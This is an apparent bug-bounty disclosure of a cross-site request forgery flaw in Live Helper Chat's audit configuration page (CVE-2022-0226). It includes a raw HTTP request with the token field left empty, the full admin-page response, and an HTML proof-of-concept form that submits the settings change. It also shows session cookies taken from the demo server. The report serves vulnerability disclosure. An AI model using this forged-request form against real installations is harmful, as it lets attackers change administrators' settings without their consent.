Lucene search
Shubh123-tri635D0ABF-7680-47F6-A277-D9A91471C73FHistoryJan 13, 2022 - 12:42 p.m.
Cross-Site Request Forgery (CSRF) in livehelperchat/livehelperchat
2022-01-1312:42:01
shubh123-tri
www.huntr.dev
6
0.001 Low
EPSS
Percentile
30.2%
Description
A CSRF issue is found in the audit configuration under settings.
It was found that no CSRF token validation is getting done on the server-side. If we remove the CSRF token and keep the CSRF token field empty, the action is getting performed.
Proof of Concept
Request
POST /site_admin/audit/configuration HTTP/1.1
Host: demo.livehelperchat.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 83
Origin: https://demo.livehelperchat.com
Connection: close
Referer: https://demo.livehelperchat.com/site_admin/audit/configuration
Cookie: _ga=GA1.2.1494213889.1641981022; __gads=ID=78426d0da5021990-22e07ad7d4cf0003:T=1641981024:RT=1641981024:S=ALNI_Mb5jWBa9H_1uJ70Tsnl4dLuQNI6zw; FCNEC=[["AKsRol8Gvrm1CBVc-yUXJyhXwXrvVxlSSrbE1K4fDpXMuGTguxgcCVosW_KcP-QBr2bKuNg2Ej1gbI9ZL7KKFlpUh7V4iz6GJdvvOR18dNMtIZEC5FZ5t8fzM90GE5h0kJnGwULoRR-vYFygP9UJvRWLtSYafLg8lw=="],null,[]]; PHPSESSID=nq51ir4qicpnju1bdmqjitcuaj
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
csfr_token=&days_log=90&log_js=on&StoreOptions=Save
In the above request, you can see that I have removed the CSRf token, and then also the server accepts this request and performs the desired action.
Successful Response
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 13 Jan 2022 10:30:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.27
Cache-Control: nocache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 02 Jan 1990 00:00:00 GMT
X-Frame-Options: SAMEORIGIN
Content-Length: 47652
<!DOCTYPE html><html lang="en" dir="" ng-app="lhcApp"><head><title ng-non-bindable>Options « System configuration « Live Helper Chat - live support</title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no"><link rel="icon" type="image/png" href="/design/defaulttheme/images/favicon.ico" /><link rel="shortcut icon" type="image/x-icon" href="/design/defaulttheme/images/favicon.ico"><meta name="Keywords" content="" /><meta name="Description" content="" /><meta name="robots" content="noindex, nofollow"><meta name="copyright" content="Remigijus Kiminas, livehelperchat.com"><link rel="stylesheet" type="text/css" href="/design/defaulttheme/css/css_static/a6692c332b973bd8c9a6ef0bd106e855.css?1641801574" /><script type="text/javascript">var WWW_DIR_JAVASCRIPT = '/site_admin/';var WWW_DIR_JAVASCRIPT_FILES = '/design/defaulttheme/sound';var WWW_DIR_LHC_WEBPACK = '/design/defaulttheme/js/lh/dist/';var WWW_DIR_LHC_WEBPACK_ADMIN = '/design/defaulttheme/js/admin/dist/';var WWW_DIR_JAVASCRIPT_FILES_NOTIFICATION = '/design/defaulttheme/images/notification';var confLH = {};confLH.back_office_sinterval = 10000;confLH.chat_message_sinterval = 3500;confLH.transLation = {"sending":"Sending...","delete_confirm":"Are you sure you want to delete this chat?","new_chat":"New chat request","transfered":"New chat has been transferred to you directly!","edit":"Edit","quote":"Quote","copy":"Copy","copy_group":"Copy all","ask_help":"Ask for help","translate":"Translate","new":"New"};confLH.new_message_sound_user_enabled = 1;confLH.csrf_token = 'ddd6453b3a4966fd49c28edd5975617b';confLH.user_id = '1';confLH.show_alert_transfer = 1;confLH.show_alert = 0;confLH.auto_join_private = 1;confLH.new_message_sound_admin_enabled = 1;confLH.new_message_browser_notification = 0;confLH.new_chat_sound_enabled = 1;confLH.sn_off = 1;confLH.ownntfonly = 0;confLH.accept_chats = 0;confLH.auto_uppercase = 1;confLH.new_dashboard = false;confLH.hide_tabs = 1;confLH.no_scroll_bottom = 0;confLH.scroll_load = 1;confLH.repeat_sound = 1;confLH.repeat_sound_delay = 5;confLH.content_language = 'en';confLH.defaultm_hegiht = '200';confLH.dlist = {'op_n':'10'};confLH.lngUser = 'en';confLH.gmaps_api_key = "";</script><script src="/design/defaulttheme/js/js_static/2961a882a73f1d6f1a235887b4ea364a.js?1641801574"></script></head><body id="admin-body" class="pr-0 " ng-cloak ng-controller="LiveHelperChatCtrl as lhc" ng-init="lhc.getToggleWidget('pending_chats_sort','false');"><nav><a href="/site_admin/" title="Live Helper Chat"><img src="/design/defaulttheme/images/general/logo.png" alt="Live Helper Chat" title="Live Helper Chat"></a><button class="btn border-0 mr-auto btn-outline-secondary" type="button" ng-click="lhc.toggleList('lmtoggle')" title="Expand or collapse left menu" aria-expanded="true" aria-label="Toggle navigation"><span>menu</span></button><div><div><i>update</i>This window will be automatically refreshed in {{lhc.lhcVersionCounter}} seconds due to a version update.</div><div>You have weak internet connection or the server has problems. Try to refresh the page. Error code {{lhc.lhcConnectivityProblemExplain}}</div><div>You went offline because of inactivity. Please close other chat windows if you have any</div></div><button class="navbar-toggler btn border-0 btn-outline-secondary pb-2" type="button" data-toggle="collapse" data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation"><span>menu</span></button><div><ul><li><a href="#"><i>{{lhc.hideOnline == true ? 'flash_off' : 'flash_on'}}</i></a></li><li><a href="#">Remigijus </a><div><div><div><div>Hello Remigijus!</div></div><div><a href="/site_admin/user/account" title="Account"><i>account_box</i>Account</a></div><div><a title="Toggle between dark and white themes" href="/site_admin/front/switchdashboard/(action)/mode"><span>settings_brightness</span>Dark/bright</a></div><div><a href="/site_admin/user/logout" title="Logout"><i>exit_to_app</i>Logout</a></div></div><hr><div><div><a href="/site_admin/user/setsetting/auto_uppercase/0"><span>check</span>Auto uppercase sentences</a></div><div><a href="/site_admin/user/setsetting/no_scroll_bottom/1"><span>remove_done</span>Do not scroll to the bottom on chat open</a></div><div><a href="/site_admin/user/setsetting/auto_preload/1"><span>remove_done</span>Auto preload previous visitor chat messages</a></div><div><a href="/site_admin/user/setsetting/scroll_load/0"><span>check</span>Load previous message on scroll</a></div><div><a href="#" title="Enable/Disable sound about new messages from users"><i>volume_up</i>New messages</a></div><div><a href="#" title="Enable/Disable sound about new pending chats"><i>volume_up</i>New chats</a></div></div><hr><div><div><a href="#" title="Change my status to online/offline"><i>{{lhc.hideOnline == true ? 'flash_off' : 'flash_on'}}</i>{{lhc.hideOnline == true ? "Offline" : "Online"}}</a></div><div><a href="#" title="Change my persistent status to online"><i>{{lhc.hideOnline == true ? 'flash_off' : (lhc.alwaysOnline == true ? 'toggle_on' : 'toggle_off')}}</i>{{lhc.alwaysOnline == true ? "Always online" : "Based on activity"}}</a></div><div><a href="#"><i>{{lhc.hideInvisible == true ? 'visibility_off' : 'visibility'}}</i>{{lhc.hideInvisible == true ? "Invisible" : "Visible"}}</a></div></div><hr></div></li><li><a title="Expand or collapse right menu"><span>menu</span></a></li></ul></div></nav><div><div><div><div><ul><li><a href="/site_admin/"><i>home</i>Dashboard</a></li><li><a href="#"><i>chat</i>Chat<i>chevron_right</i></a><ul><li><a href="#"><i>chat</i>Chat tabs</a></li><li><a href="/site_admin/chat/list"><i>list</i>Chats list</a></li><li><a href="/site_admin/views/home"><i>saved_search</i>My views</a></li><li><a href="/site_admin/chat/onlineusers"><i>face</i>Online visitors</a></li></ul></li><li><a href="/site_admin/system/configuration"><i>settings_applications</i>Settings</a></li><li><a href="#"><i>info_outline</i>Modules<i>chevron_right</i></a><ul><li><a href="/site_admin/questionary/list"><i>email</i>Questionary</a></li><li><a href="/site_admin/faq/list"><i>help</i>FAQ</a></li><li><a href="/site_admin/chatbox/configuration"><i>comment</i>Chatbox</a></li><li><a href="/site_admin/browseoffer/index"><i>open_in_browser</i>Browse offers</a></li><li><a href="/site_admin/form/index"><i>attachment</i>Forms</a></li><li><a href="/site_admin/fbmessenger/index"><i>comment</i>Facebook chat</a></li></ul></li></ul></div></div></div><div><div><ul>
<li><a href="/site_admin/"><span>Home</span></a></li><li><a href="/site_admin/system/configuration"><span>System configuration</span></a></li><li><span>Options</span></li></ul></div><div><div><h1>Audit Configuration</h1><form action="" method="post" ng-non-bindable><input type="hidden" name="csfr_token" value="ddd6453b3a4966fd49c28edd5975617b" /><div><button type="button" class="close" data-dismiss="alert" aria-label="Close"><span>×</span></button>Settings updated</div><div><label>How many days keep log?</label><input type="text" class="form-control" name="days_log" value="90" /></div><div><label><input type="checkbox" name="log_js" checked value="on" /> Log javascript errors</label></div><div><label><input type="checkbox" name="log_block" value="on" /> Log applied blocks</label></div><div><label><input type="checkbox" name="log_user" value="on" /> Log users changes</label></div><h5>What objects changes log?</h5><div><div><label><input type="checkbox" name="log_objects[]" value="AutoResponder">Auto Responder</label></div><div><label><input type="checkbox" name="log_objects[]" value="CannedMsg">Canned Message</label></div><div><label><input type="checkbox" name="log_objects[]" value="Subject">Subject</label></div><div><label><input type="checkbox" name="log_objects[]" value="Departament">Department</label></div></div><input type="submit" class="btn btn-secondary" name="StoreOptions" value="Save" /></form></div><div><div>
<ul><li><a title="Chats transferred to you directly" href="#transferedperson"><i>account_box</i><span></span></a></li><li><a title="Transferred to your department" href="#transfereddep"><i>account_box</i><span></span></a></li></ul>
<div><div><div><ul><li><img src="/design/defaulttheme/images/icons/accept.png" alt="Accept chat" title="Accept chat"><img src="/design/defaulttheme/images/icons/application_add.png" alt="Open in a new window" title="Open in a new window"> {{chat.id}}. {{chat.nick}} ({{chat.time_front}})</li></ul><p>Empty...</p></div></div><div><div><ul><li><img src="/design/defaulttheme/images/icons/accept.png" alt="Accept chat" title="Accept chat"><img src="/design/defaulttheme/images/icons/application_add.png" alt="Open in a new window" title="Open in a new window"> {{chat.id}}. {{chat.nick}} ({{chat.time_front}})</li></ul><p>Empty...</p></div></div></div></div><div><div><a href="/site_admin/chat/list/(user_id)/1"><i>account_box</i>My active and pending chats ({{my_chats.list.length}}{{my_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand">{{my_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div><div><div><div><div><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.mcd.length == 0 ? "All departments" : (lhc.mcd.length == 1 && true ? lhc.mcdNames.join(", ") : '['+lhc.mcd.length+'] '+'departments')}}</button><ul><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('mcd',true)" ng-model="lhc.mcd_hide_hidden"> Hide hidden</label></li><li><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('mcd',true)" type="checkbox" ng-model="lhc.mcd_hide_disabled"> Hide disabled</label></li><li><label><input type="checkbox" checklist-model="lhc.mcd_products" checklist-change="lhc.productChanged('mcd_products')" checklist-value="product.id"><i></i>{{product.name}}</label></li><li></li><li><label><input type="checkbox" checklist-model="lhc.mcd_dpgroups" checklist-change="lhc.productChanged('mcd_dpgroups')" checklist-value="department.id"><i></i>{{department.name}}</label></li><li></li><li><label><input type="checkbox" checklist-model="lhc.mcd" checklist-change="lhc.departmentChanged('mcd')" checklist-value="department.id"><i>home</i>{{department.name}}</label></li></ul></div></div><div><select class="form-control form-control-sm btn-light" ng-model="lhc.limitmc" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div><table><thead><tr><th width="40%"><i>face</i></th><th width="20%"><i>{{column.icon}}</i>{{column.name}}</th><th width="25%"><i>access_time</i></th><th width="20%"><i>home</i></th></tr></thead><tr><td><div><span><img alt="{{chat.country_name}}" title="{{chat.country_name}}" /> </span><a>info_outline</a><i>feedback</i><i>{{icon.i || icon}}</i>{{chat.nick}}</div></td><td><div>{{chat[val]}} </div></td><td><div><i></i><span>{{chat.pnd_rsp === true ? 'call_received' : 'call_made'}}</span>{{chat.status == 0 ? '⏳ '+chat.wait_time_pending : chat.last_msg_time_front}}</div></td><td><div>{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table></div><div><i>search</i>Nothing found...</div></div><div><a href="/site_admin/chat/list/(chat_status_ids)/0"><i>chat</i>Pending chats ({{pending_chats.list.length}}{{pending_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand">{{pending_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div><div><div><div><div><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.pendingd.length == 0 ? "All departments" : (lhc.pendingd.length == 1 && true ? lhc.pendingdNames.join(", ") : '['+lhc.pendingd.length+'] '+'departments')}}</button><ul><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('pendingd',true)" ng-model="lhc.pendingd_hide_hidden"> Hide hidden</label></li><li><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('pendingd',true)" type="checkbox" ng-model="lhc.pendingd_hide_disabled"> Hide disabled</label></li><li><label><input type="checkbox" checklist-model="lhc.pendingd_products" checklist-change="lhc.productChanged('pendingd_products')" checklist-value="product.id"><i></i>{{product.name}}</label></li><li></li><li><label><input type="checkbox" checklist-model="lhc.pendingd_dpgroups" checklist-change="lhc.productChanged('pendingd_dpgroups')" checklist-value="department.id"><i></i>{{department.name}}</label></li><li></li><li><label><input type="checkbox" checklist-model="lhc.pendingd" checklist-change="lhc.departmentChanged('pendingd')" checklist-value="department.id"><i>home</i>{{department.name}}</label></li></ul></div></div><div><div><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">Users</button><ul><li><input type="text" data-stopPropagation="true" ng-model="lhc.userFilterText" placeholder="Search for operator" class="form-control form-control-sm" value=""></li><li><label><input type="checkbox" checklist-model="lhc.pendingu" checklist-change="lhc.productChanged('pendingu')" checklist-value="userItem.id"><i>account_box</i>{{userItem.name || userItem.name_official}}</label></li><li></li><li><label><input type="checkbox" checklist-model="lhc.pendingd_ugroups" checklist-change="lhc.productChanged('pendingd_ugroups')" checklist-value="userGroup.id"><i>people</i>{{userGroup.name}}</label></li></ul></div></div><div><select class="form-control form-control-sm btn-light" ng-model="lhc.limitp" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div><table><thead><tr><th width="40%"><i>face</i><a><i>{{lhc.toggleWidgetData['pending_chats_sort'] == false ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%"><i>{{column.icon}}</i>{{column.name}}</th><th width="20%"><i>access_time</i></th><th width="20%"><i>home</i></th></tr></thead><tr><td><div><a title="Delete chat">delete</a><span><img alt="{{chat.country_name}}" title="{{chat.country_name}}" /> </span><a title="Redirect user to contact form.">reply</a><a>info_outline</a><i>mail</i><span><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" /> </span><i>{{icon.i || icon}}</i>{{chat.nick}}<small>{{chat.plain_user_name !== undefined ? ' | ' + chat.plain_user_name : ''}}</small></div></td><td><div>{{chat[val]}} </div></td><td><div>{{chat.wait_time_pending}}</div></td><td><div><a><i>donut_large</i>{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</a></div></td></tr></table><div><i>search</i>Nothing found...</div></div></div><div><a href="/site_admin/chat/list/(chat_status_ids)/1"><i>chat</i>Active chats ({{active_chats.list.length}}{{active_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand">{{active_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div><div><div><div><div><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.actived.length == 0 ? "All departments" : (lhc.actived.length == 1 && true ? lhc.activedNames.join(", ") : '['+lhc.actived.length+'] '+'departments')}}</button><ul><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('actived',true)" ng-model="lhc.actived_hide_hidden"> Hide hidden</label></li><li><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('actived',true)" type="checkbox" ng-model="lhc.actived_hide_disabled"> Hide disabled</label></li><li><label><input type="checkbox" checklist-model="lhc.actived_products" checklist-change="lhc.productChanged('actived_products')" checklist-value="product.id"><i></i>{{product.name}}</label></li><li></li><li><label><input type="checkbox" checklist-model="lhc.actived_dpgroups" checklist-change="lhc.productChanged('actived_dpgroups')" checklist-value="department.id"><i></i>{{department.name}}</label></li><li></li><li><label><input type="checkbox" checklist-model="lhc.actived" checklist-change="lhc.departmentChanged('actived')" checklist-value="department.id"><i>home</i>{{department.name}}</label></li></ul></div></div><div><div><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">Users</button><ul><li><input type="text" data-stopPropagation="true" ng-model="lhc.userFilterText" placeholder="Search for operator" class="form-control form-control-sm" value=""></li><li><label><input type="checkbox" checklist-model="lhc.activeu" checklist-change="lhc.productChanged('activeu')" checklist-value="userItem.id"><i>account_box</i>{{userItem.name || userItem.name_official}}</label></li><li></li><li><label><input type="checkbox" checklist-model="lhc.actived_ugroups" checklist-change="lhc.productChanged('actived_ugroups')" checklist-value="userGroup.id"><i>people</i>{{userGroup.name}}</label></li></ul></div></div><div><select class="form-control form-control-sm btn-light" ng-model="lhc.limita" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div><table><thead><tr><th width="40%"><a><i></i><i>{{lhc.toggleWidgetData['active_chats_sort'] == 'loc_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'loc_asc' ? 'trending_up' : 'trending_down'}}</i></a> <a><i>face</i><i>{{lhc.toggleWidgetData['active_chats_sort'] == 'u_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'u_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%"><i>{{column.icon}}</i>{{column.name}}</th><th width="20%"><a><i>{{lhc.toggleWidgetData['active_chats_sort'] == 'lmt_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'lmt_asc' ? 'trending_up' : 'trending_down'}}</i></a><a><i>{{lhc.toggleWidgetData['active_chats_sort'] == 'id_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'id_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%"><a><i>{{lhc.toggleWidgetData['active_chats_sort'] == 'op_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'op_asc' ? 'trending_up' : 'trending_down'}}</i></a></th><th width="20%"><a><i>{{lhc.toggleWidgetData['active_chats_sort'] == 'dep_dsc' || lhc.toggleWidgetData['active_chats_sort'] != 'dep_asc' ? 'trending_up' : 'trending_down'}}</i></a></th></tr></thead><tr><td><div><span><img alt="{{chat.country_name}}" title="{{chat.country_name}}" /> </span><a title="[{{chat.id}}] {{chat.time_created_front}}">info_outline</a><i>mail</i><i>feedback</i><span><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" /> </span><i>{{icon.i || icon}}</i>{{chat.nick}}</div></td><td><div>{{chat[val]}} </div></td><td><div><span>{{chat.pnd_rsp === true ? 'call_received' : 'call_made'}}</span>{{chat.last_msg_time_front ? chat.last_msg_time_front : '✉'}}</div></td><td><div>{{chat.n_office}}</div></td><td><div><a><i>donut_large</i>{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</a></div></td></tr></table><div><i>search</i>Nothing found...</div></div></div><div><a href="/site_admin/chat/list/(hum)/1"><i>chat</i>Unread messages ({{unread_chats.list.length}}{{unread_chats.list.length == 10 ? '+' : ''}})</a><a title="collapse/expand">{{unread_chats_expanded == true ? 'expand_less' : 'expand_more'}}</a></div><div><table><thead><tr><th width="50%"><i>face</i></th><th width="20%"><i>{{column.icon}}</i>{{column.name}}</th><th width="30%"><i>access_time</i></th><th width="20%"><i>home</i></th></tr></thead><tr><td><div><span><img alt="{{chat.country_name}}" title="{{chat.country_name}}" /> </span><a>info_outline</a> {{chat.nick}}</div></td><td><div>{{chat[val]}} </div></td><td><div>{{chat.unread_time.hours}} h. {{chat.unread_time.minits}} m. {{chat.unread_time.seconds}} s. ago.</div></td><td><div>{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table><div><i>search</i>Nothing found...</div></div><div><div><i>settings_applications</i><a href="/site_admin/chat/list/(chat_status_ids)/5"><i>android</i> Bot chats ({{bot_chats.list.length}}{{bot_chats.list.length == lhc.limitb ? '+' : ''}})</a><a title="collapse/expand">{{lhc.toggleWidgetData['botc_widget_exp'] == false ? 'expand_less' : 'expand_more'}}</a></div><div><div><div><div><div><button type="button" class="btn btn-light btn-block btn-sm dropdown-toggle btn-department-dropdown" data-toggle="dropdown" aria-expanded="false">{{lhc.botd.length == 0 ? "All departments" : (lhc.botd.length == 1 && true ? lhc.botdNames.join(", ") : '['+lhc.botd.length+'] '+'departments')}}</button><ul><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_all_departments"> Check all</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_only_online"> Only online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_only_explicit_online"> Only explicit online</label></li><li><label><input type="checkbox" ng-change="lhc.allDepartmentsChanged('botd',true)" ng-model="lhc.botd_hide_hidden"> Hide hidden</label></li><li><label><input data-stopPropagation="true" ng-change="lhc.allDepartmentsChanged('botd',true)" type="checkbox" ng-model="lhc.botd_hide_disabled"> Hide disabled</label></li><li><label><input type="checkbox" checklist-model="lhc.botd_products" checklist-change="lhc.productChanged('botd_products')" checklist-value="product.id"><i></i>{{product.name}}</label></li><li></li><li><label><input type="checkbox" checklist-model="lhc.botd_dpgroups" checklist-change="lhc.productChanged('botd_dpgroups')" checklist-value="department.id"><i></i>{{department.name}}</label></li><li></li><li><label><input type="checkbox" checklist-model="lhc.botd" checklist-change="lhc.departmentChanged('botd')" checklist-value="department.id"><i>home</i>{{department.name}}</label></li></ul></div></div><div><select class="form-control form-control-sm btn-light" ng-model="lhc.limitb" title="Number of elements in list"><option value="5">5</option><option value="10">10</option><option value="25">25</option><option value="50">50</option><option value="100">100</option></select></div></div></div><div><table><thead><tr><th width="40%"><i>face</i></th><th width="20%"><i>{{column.icon}}</i>{{column.name}}</th><th width="25%"><i>access_time</i></th><th width="20%"><i>home</i></th></tr></thead><tr><td><div><span><img alt="{{chat.country_name}}" title="{{chat.country_name}}" /> </span><a title="[{{chat.id}}] {{chat.time_created_front}}">info_outline</a><i>mail</i><span><img width="14" src="/extension/fbmessenger/design/fbmessengertheme/images/F_icon.svg" title="Facebook chat" /> </span><span>[{{chat.msg_v || 0}}]</span> <i>whatshot</i><i>{{icon.i || icon}}</i>{{chat.nick}}</div></td><td><div>{{chat[val]}} </div></td><td><div>{{chat.time_created_front}}</div></td><td><div>{{chat.department_name}}{{chat.product_name ? ' | '+chat.product_name : ''}}</div></td></tr></table></div><div><i>search</i>Bot chats will appear here....</div></div></div></div></div></div></div></div><div><p><a target="_blank" href="http://livehelperchat.com">Live Helper Chat © 2022</a></p>
<p><a href="http://livehelperchat.com">Live Helper Chat</a></p>
</div><script type="text/javascript" src="/design/defaulttheme/js/js_static/55ece73a8d637ed105f7df02bf7597c8.js?1641801573"></script></body></html>
POC
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://demo.livehelperchat.com/site_admin/audit/configuration" method="POST">
<input type="hidden" name="csfr_token" value="" />
<input type="hidden" name="days_log" value="90" />
<input type="hidden" name="log_js" value="on" />
<input type="hidden" name="StoreOptions" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Impact
This vulnerability is capable of tricking the admin in changing audit log configuration.
Related
cnvd
cnvd
livehelperchat Cross-site Request Forgery Vulnerability (CNVD-2022-08039)
2022-01-17 00:00:00
nvd
nvd
CVE-2022-0226
2022-01-14 19:15:08
osv
osv
Cross-Site Request Forgery (CSRF) in livehelperchat
2022-01-26 20:21:03
BIT-livehelperchat-2022-0226
2024-03-06 10:57:47
CVE-2022-0226
2022-01-14 19:15:08
prion
prion
Cross site request forgery (csrf)
2022-01-14 19:15:00
github
github
Cross-Site Request Forgery (CSRF) in livehelperchat
2022-01-26 20:21:03
cve
cve
CVE-2022-0226
2022-01-14 19:15:08
cvelist
cvelist